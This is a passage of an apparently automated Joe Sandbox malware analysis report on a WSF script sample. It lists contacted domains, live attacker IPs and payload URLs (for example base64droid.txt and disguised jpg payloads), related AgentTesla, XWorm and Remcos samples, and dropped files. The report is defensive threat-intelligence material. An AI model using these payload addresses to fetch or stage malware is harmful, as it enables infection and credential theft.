https://www.google.com;	0%	Avira URL Cloud	safe
https://analytics.paste.ee;	0%	Avira URL Cloud	safe
http://45.74.19.84/xampp/bkp/new_image_wsf.jpg	100%	Avira URL Cloud	malware
https://cdnjs.cloudflare.com;	0%	Avira URL Cloud	safe
https://uploaddeimagens.com.br	0%	Avira URL Cloud	safe
https://uploaddeimagens.com.br/images/004/739/228/original/new_image_wsf.jpg?1707826743	0%	Avira URL Cloud	safe
http://172.245.214.91/base64droid.txt	100%	Avira URL Cloud	malware
http://45.74.19.84	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
paste.ee	104.21.84.67	true	false	high
ip-api.com	208.95.112.1	true	false	high
uploaddeimagens.com.br	172.67.215.45	true	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://172.245.214.91/base64droid.txt	true	Avira URL Cloud: malware	unknown
https://uploaddeimagens.com.br/images/004/739/228/original/new_image_wsf.jpg?1707826743	true	Avira URL Cloud: safe	unknown
http://paste.ee/d/SDfNF	false		high
https://paste.ee/d/SDfNF	false		high
http://ip-api.com/line/?fields=hosting	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://paste.ee/?	wscript.exe, 00000000.00000003.2122394603.000001E596363000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125290537.000001E596364000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123509518.000001E596363000.00000004.00000020.00020000.00000000.sdmp	false		high
https://paste.ee/d/SDfNFS	wscript.exe, 00000000.00000003.2122394603.000001E596363000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125290537.000001E596364000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123509518.000001E596363000.00000004.00000020.00020000.00000000.sdmp	false		high
https://account.dyn.com/	AddInProcess32.exe, 00000008.00000002.3359661563.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000004.00000002.2435469056.0000020D2B733000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://45.74.19.84	powershell.exe, 00000004.00000002.2435469056.0000020D2B733000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://crl.microsoft	powershell.exe, 00000002.00000002.2753314836.000001D6C0880000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000004.00000002.2435469056.0000020D2B733000.00000004.00000800.00020000.00000000.sdmp	false		high
http://paste.ee/d/SDf	wscript.exe, 00000000.00000003.2124444214.000001E596697000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125416320.000001E596698000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com;	wscript.exe, 00000000.00000003.2122394603.000001E59637A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125355839.000001E5963BC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://analytics.paste.ee	wscript.exe, 00000000.00000003.2122394603.000001E59637A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125355839.000001E5963BC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6	powershell.exe, 00000002.00000002.2710395460.000001D6A876E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000004.00000002.2435469056.0000020D2B733000.00000004.00000800.00020000.00000000.sdmp	false		high
https://paste.ee:443/d/SDfNF	wscript.exe, 00000000.00000003.2122531094.000001E596345000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125207821.000001E596345000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com	wscript.exe, 00000000.00000003.2122394603.000001E59637A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125355839.000001E5963BC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://uploaddeimagens.com.br	powershell.exe, 00000004.00000002.2435469056.0000020D2B8E9000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://ip-api.com	AddInProcess32.exe, 00000008.00000002.3367046963.00000000029BA000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.3367046963.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.3367046963.00000000028E1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://analytics.paste.ee;	wscript.exe, 00000000.00000003.2122394603.000001E59637A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125355839.000001E5963BC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://cdnjs.cloudflare.com	wscript.exe, 00000000.00000003.2122394603.000001E59637A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125355839.000001E5963BC000.00000004.00000020.00020000.00000000.sdmp	false		high
http://45.74.19.84/xampp/bkp/new_image_wsf.jpg	powershell.exe, 00000004.00000002.2430800998.0000020D2952A000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://aka.ms/pscore68	powershell.exe, 00000002.00000002.2710395460.000001D6A878B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2435469056.0000020D2B511000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdnjs.cloudflare.com;	wscript.exe, 00000000.00000003.2122394603.000001E59637A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125355839.000001E5963BC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.2710395460.000001D6A87BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2435469056.0000020D2B511000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.3367046963.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.3367046963.00000000028E1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://secure.gravatar.com	wscript.exe, 00000000.00000003.2122394603.000001E59637A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125355839.000001E5963BC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://themes.googleusercontent.com	wscript.exe, 00000000.00000003.2122394603.000001E59637A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125355839.000001E5963BC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://paste.ee/d/SDfNFPh	wscript.exe, 00000000.00000003.2122394603.000001E596363000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125290537.000001E596364000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123509518.000001E596363000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
172.245.214.91	unknown	United States	36352	AS-COLOCROSSINGUS	true
45.74.19.84	unknown	United States	29802	HVC-ASUS	true
104.21.84.67	paste.ee	United States	13335	CLOUDFLARENETUS	false
172.67.215.45	uploaddeimagens.com.br	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1393061
Start date and time:	2024-02-15 19:41:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 27s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	rdevuelto_Pagos.wsf
Detection:	MAL
Classification:	mal100.spre.troj.spyw.expl.evad.winWSF@8/6@3/5
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 100% Number of executed functions: 14 Number of non-executed functions: 3
Cookbook Comments:	Found application associated with file extension: .wsf

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 6136 because it is empty
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: rdevuelto_Pagos.wsf

Simulations

Behavior and APIs

Time	Type	Description
19:42:01	API Interceptor	2x Sleep call for process: wscript.exe modified
19:42:02	API Interceptor	98x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	PO20152024.scr.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	ip-api.com/line/?fields=hosting
	kzl9Cp2ZBN.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Abotihy.exe	Get hash	malicious	Phemedrone Stealer	Browse	ip-api.com/json/?fields=11827
	P000022633.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	itinerary Program.exe	Get hash	malicious	AgentTesla, Discord Token Stealer	Browse	ip-api.com/line/?fields=hosting
	PO-38667-386647 MAYOREO FERRETERO ATLAS SA DE CV.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	aaa.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	S#U0130PAR#U0130#U015e NO.14600.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	ip-api.com/line/?fields=hosting
	657894-02-04T142248.263.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	x2tzaBC3r0.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
172.245.214.91	ODC#PO 4500628950098574654323567875765674433##633.xla.xlsx	Get hash	malicious	Unknown	Browse	172.245.214.91/droidtuesday.vbs
	comprobante0089.xla.xlsx	Get hash	malicious	AgentTesla	Browse	172.245.214.91/base64droid.txt
	ODC#POX4500628950098574654323567875765674463.xla.xlsx	Get hash	malicious	AgentTesla	Browse	172.245.214.91/base64droid.txt
	cotizaci#U00f3n para nuevo pedido.xla.xlsx	Get hash	malicious	AgentTesla	Browse	172.245.214.91/base64droid.txt
	orden00878t9.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	172.245.214.91/base64droid.txt
	Facturas 000005111, 005112,, 005113, 005114 0005115.xla.xlsx	Get hash	malicious	AgentTesla	Browse	172.245.214.91/base64droid.txt
	solicitud de cotizaci#U00f3n.xla.xlsx	Get hash	malicious	AgentTesla	Browse	172.245.214.91/base64droid.txt
	cotizaci#U00f3n089586979070976WSF.xla.xlsx	Get hash	malicious	Unknown	Browse	172.245.214.91/mangero.wsf
45.74.19.84	Name.vbs	Get hash	malicious	Unknown	Browse	45.74.19.84/xampp/bkp/bkp1_vbs.jpg
	RFQ l MR24000112.xla.xlsx	Get hash	malicious	Unknown	Browse	45.74.19.84/xampp/bkp/new_image_vbs_updated.jpg
	ODC#POX4500628950098574654323567875765674463.xla.xlsx	Get hash	malicious	AgentTesla	Browse	45.74.19.84/xampp/bkp/bkp_hta.jpg
	screen_shots.vbs	Get hash	malicious	XWorm	Browse	45.74.19.84/xampp/bkp/bkp1_vbs.jpg
	Rendel#U00e9s_(PO5042208)_Az Idumont.hta	Get hash	malicious	AgentTesla	Browse	45.74.19.84/xampp/bkp/bkp_hta.jpg
	96874650.vbs	Get hash	malicious	XWorm	Browse	45.74.19.84/xampp/bkp/bkp1_vbs.jpg
	182763543.vbs	Get hash	malicious	XWorm	Browse	45.74.19.84/xampp/bkp/bkp1_vbs.jpg
	Encomenda_(P.O_4203445-2024)_Multi-fluido.js	Get hash	malicious	AgentTesla	Browse	45.74.19.84/xampp/bkp/js_bkp.jpg
	Yeni fatura.docx.doc	Get hash	malicious	Remcos	Browse	45.74.19.84/xampp/bkp/bkp1_vbs.jpg

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip-api.com	PO20152024.scr.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	kzl9Cp2ZBN.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Abotihy.exe	Get hash	malicious	Phemedrone Stealer	Browse	208.95.112.1
	P000022633.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	itinerary Program.exe	Get hash	malicious	AgentTesla, Discord Token Stealer	Browse	208.95.112.1
	PO-38667-386647 MAYOREO FERRETERO ATLAS SA DE CV.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	aaa.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	S#U0130PAR#U0130#U015e NO.14600.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	208.95.112.1
	657894-02-04T142248.263.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	x2tzaBC3r0.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
paste.ee	EWW.vbs	Get hash	malicious	Unknown	Browse	172.67.187.200
	Product list 0980DF098A7.xls	Get hash	malicious	Unknown	Browse	104.21.84.67
	ODC#PO 4500628950098574654323567875765674433##633.xla.xlsx	Get hash	malicious	Unknown	Browse	172.67.187.200
	Purchase Order PO0193832.vbs	Get hash	malicious	Unknown	Browse	172.67.187.200
	Payment_advice.vbs	Get hash	malicious	Unknown	Browse	104.21.84.67
	SHREE GANESH BOOK SERVICES-347274.xls	Get hash	malicious	Unknown	Browse	104.21.84.67
	dereac.vbe	Get hash	malicious	Unknown	Browse	104.21.84.67
	Name.vbs	Get hash	malicious	Unknown	Browse	172.67.187.200
	P018400.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.84.67
	517209487.vbs	Get hash	malicious	XWorm	Browse	172.67.187.200
uploaddeimagens.com.br	Purchase Order PO0193832.vbs	Get hash	malicious	Unknown	Browse	104.21.45.138
	Payment_advice.vbs	Get hash	malicious	Unknown	Browse	172.67.215.45
	SHREE GANESH BOOK SERVICES-347274.xls	Get hash	malicious	Unknown	Browse	104.21.45.138
	dereac.vbe	Get hash	malicious	Unknown	Browse	172.67.215.45
	Name.vbs	Get hash	malicious	Unknown	Browse	104.21.45.138
	P018400.xla.xlsx	Get hash	malicious	Unknown	Browse	172.67.215.45
	517209487.vbs	Get hash	malicious	XWorm	Browse	104.21.45.138
	comprobante0089.xla.xlsx	Get hash	malicious	AgentTesla	Browse	104.21.45.138
	RFQ l MR24000112.xla.xlsx	Get hash	malicious	Unknown	Browse	172.67.215.45
	wsf.zip	Get hash	malicious	Remcos	Browse	172.67.215.45

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://tcdgdev.com/	Get hash	malicious	Unknown	Browse	104.18.11.207
	Chk#08495.html	Get hash	malicious	Unknown	Browse	104.17.24.14
	bang_executor.exe	Get hash	malicious	Dicrord Rat	Browse	162.159.136.234
	https://firrifm.com/MzkxaDz6MDkxTzd1OFU=	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://get.clipclip.com/ClipClipSetup.exe	Get hash	malicious	Unknown	Browse	172.67.69.95
	https://kiddushes.com/0/0/0/8e76d9aee5809553ad6668c7bfbfd114/oth23	Get hash	malicious	Phisher	Browse	104.21.80.104
	AntiDOT.exe	Get hash	malicious	LummaC	Browse	172.67.154.29
	1.exe	Get hash	malicious	LummaC, Remcos	Browse	104.21.4.139
	http://yg5sjx5kzy.com	Get hash	malicious	Unknown	Browse	104.19.219.90
	http://yg5sjx5kzy.com	Get hash	malicious	Unknown	Browse	104.19.218.90
TUT-ASUS	PO20152024.scr.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	kzl9Cp2ZBN.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Abotihy.exe	Get hash	malicious	Phemedrone Stealer	Browse	208.95.112.1
	P000022633.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	itinerary Program.exe	Get hash	malicious	AgentTesla, Discord Token Stealer	Browse	208.95.112.1
	PO-38667-386647 MAYOREO FERRETERO ATLAS SA DE CV.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	aaa.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	S#U0130PAR#U0130#U015e NO.14600.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	208.95.112.1
	657894-02-04T142248.263.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	x2tzaBC3r0.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
AS-COLOCROSSINGUS	https://kiddushes.com/0/0/0/8e76d9aee5809553ad6668c7bfbfd114/oth23	Get hash	malicious	Phisher	Browse	107.175.15.20
	Product list 0980DF098A7.xls	Get hash	malicious	Unknown	Browse	107.175.202.154
	https://emails.insurancebusinessmag.com/e3t/Ctc/I8+113/d2zjxh04/VW6MJZ3VsG_FW59y6sK5CSs0DW7vv0b_59w_LDN3DlwGW3qgyTW95jsWP6lZ3pnW1Lk0VP2nvPGGW2Xk_qt38sGysN7zvKMv51TnpVNLfGL2Y4y5nW4xZ_495G_MNBW7Md-kN48pBLzVP_Sbm8YLGhvW2_Dt7-8Y-2d6W8PvxMX1pNkspW5HB4ZZ8lTxJ4W6sdDSx73qKmwW9f_1248yq_JdW8lT3vj8VM8BhW88FCLX6pL2dQW31lbRb1fJD8SW6SlWz17cY4WWW9kR85K1HNMvHVc6nkv1BLpKSW4lcsvZ5xxct8W993L8-1_l2F-W8lKlnP5BX528W2KR4NP9jytmLW14HJbz10WLxkW1fss5C6bTz4VW6c0tM070QDhpW5V8-zV3N2bxjW4w8sgH1zQ1pgW8TrVXK6HsHJ8Vv255V4KlhgsW3NdB0Z7FClb_f40hfm204	Get hash	malicious	Unknown	Browse	23.95.182.9
	DTR00000009000.cmd.exe	Get hash	malicious	Remcos	Browse	107.175.229.139
	FA98655890008000.bat.exe	Get hash	malicious	PureLog Stealer, Remcos	Browse	107.175.229.139
	ODC#PO 4500628950098574654323567875765674433##633.xla.xlsx	Get hash	malicious	Unknown	Browse	172.245.214.91
	https://www.youdaizc.cn/	Get hash	malicious	Unknown	Browse	198.23.229.208
	https://www.vktndvw.cn/	Get hash	malicious	Unknown	Browse	198.23.229.208
	z15TFDG098700080000800.BAT.exe	Get hash	malicious	Remcos	Browse	107.175.229.139
	3PDFfdp.exe	Get hash	malicious	DarkTortilla, Remcos	Browse	107.175.229.139
HVC-ASUS	Omvpbu.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	209.133.204.178
	Payment_advice.vbs	Get hash	malicious	Unknown	Browse	45.74.19.84
	Name.vbs	Get hash	malicious	Unknown	Browse	45.74.19.84
	Mlfqslack.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	209.133.204.178
	517209487.vbs	Get hash	malicious	XWorm	Browse	45.74.19.84
	RFQ l MR24000112.xla.xlsx	Get hash	malicious	Unknown	Browse	45.74.19.84
	SecuriteInfo.com.Win32.PWSX-gen.18629.26158.exe	Get hash	malicious	AgentTesla	Browse	209.133.204.178
	wsf.zip	Get hash	malicious	Remcos	Browse	45.74.19.84
	ODC#POX4500628950098574654323567875765674463.xla.xlsx	Get hash	malicious	AgentTesla	Browse	45.74.19.84
	x86.elf	Get hash	malicious	Mirai	Browse	107.155.88.148
CLOUDFLARENETUS	https://tcdgdev.com/	Get hash	malicious	Unknown	Browse	104.18.11.207
	Chk#08495.html	Get hash	malicious	Unknown	Browse	104.17.24.14
	bang_executor.exe	Get hash	malicious	Dicrord Rat	Browse	162.159.136.234
	https://firrifm.com/MzkxaDz6MDkxTzd1OFU=	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://get.clipclip.com/ClipClipSetup.exe	Get hash	malicious	Unknown	Browse	172.67.69.95
	https://kiddushes.com/0/0/0/8e76d9aee5809553ad6668c7bfbfd114/oth23	Get hash	malicious	Phisher	Browse	104.21.80.104
	AntiDOT.exe	Get hash	malicious	LummaC	Browse	172.67.154.29
	1.exe	Get hash	malicious	LummaC, Remcos	Browse	104.21.4.139
	http://yg5sjx5kzy.com	Get hash	malicious	Unknown	Browse	104.19.219.90
	http://yg5sjx5kzy.com	Get hash	malicious	Unknown	Browse	104.19.218.90

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	bang_executor.exe	Get hash	malicious	Dicrord Rat	Browse	172.67.215.45
	PO20152024.scr.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.215.45
	CV Mariana Alvarez.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.215.45
	mwcPF1EpU6.exe	Get hash	malicious	DCRat	Browse	172.67.215.45
	rProdutos_Digitalizados.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.215.45
	rFxu4PWpaCC68iKa.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.215.45
	INV2024020090.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.215.45
	Boyle and Summers document 2024 (4).xls	Get hash	malicious	HTMLPhisher	Browse	172.67.215.45
	Omvpbu.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.215.45
	Abotihy.exe	Get hash	malicious	Phemedrone Stealer	Browse	172.67.215.45
a0e9f5d64349fb13191bc781f81f42e1	AntiDOT.exe	Get hash	malicious	LummaC	Browse	104.21.84.67
	1.exe	Get hash	malicious	LummaC, Remcos	Browse	104.21.84.67
	OFFICIISWO.xlsx	Get hash	malicious	Unknown	Browse	104.21.84.67
	REMU.xlsx	Get hash	malicious	Unknown	Browse	104.21.84.67
	Boyle and Summers document 2024 (4).xls	Get hash	malicious	HTMLPhisher	Browse	104.21.84.67
	file.exe	Get hash	malicious	RisePro Stealer	Browse	104.21.84.67
	file.exe	Get hash	malicious	RisePro Stealer	Browse	104.21.84.67
	#U0417#U0430#U043f#U0438#U0442.docx.exe	Get hash	malicious	LummaC	Browse	104.21.84.67
	file.exe	Get hash	malicious	RisePro Stealer	Browse	104.21.84.67
	file.exe	Get hash	malicious	RisePro Stealer	Browse	104.21.84.67

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	9434
Entropy (8bit):	4.9243637703272345
Encrypted:	false
SSDEEP:	192:exoe5lpOdxoe56ib49Vsm5emdagkjDt4iWN3yBGHB9smMdcU6CBdcU6Ch9smPpOU:cVib49Vkjh4iUx4cYKib4o
MD5:	EF4099FCAB6D29945272316889156337
SHA1:	5AAFAD4581D21179B892604BEBD6038792F8CBD6
SHA-256:	A86220AB1F2A5498457C8801DFCBB2FE3EA6977378CE7E3EEBD007336AFDB3BC
SHA-512:	EC9BB5508D39E6C038878F789DE84F7FBDC87CD20AE3EF81D68BC6589784ADB98EDCDEBF544A463C0AB2F01F52B743803A49A4F3A54FD3D003851B7DEEB8014C
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1510207563435464
Encrypted:	false
SSDEEP:	3:NlllulR6f1Z:NllUc
MD5:	E3A9DE2CB517872DD86F011FD073811F
SHA1:	9157E9444559E1A626DDDF9F659FF18F8BCA36F0
SHA-256:	7ABC0A81F079A37921907141B02FF0A5414B1D96B9073DE24B614D7C6996E244
SHA-512:	D50A20E5C20518F16D121057DF1935AFF3388F2A037E3B1A8AD9EB994CE2471C8B281C26E351C1BA7496DD29D43022E0AA1E6B6C547CC756CF7E96263580B5C6
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e.................................@..............@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pi2imzht.5m4.ps1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qjfol24t.srq.psm1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w0nlq4op.4uo.ps1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ze3ieubl.skw.psm1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	HTML document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Entropy (8bit):	3.430385815950746
TrID:	Text - UTF-16 (LE) encoded (2002/1) 64.44% MP3 audio (1001/1) 32.22% Lumena CEL bitmap (63/63) 2.03% Corel Photo Paint (41/41) 1.32%
File name:	rdevuelto_Pagos.wsf
File size:	828 bytes
MD5:	46fa85349bcc37dee6ee99b7f26b1967
SHA1:	2c829c6281ce8d60e356e0fd05ffec863b37be82
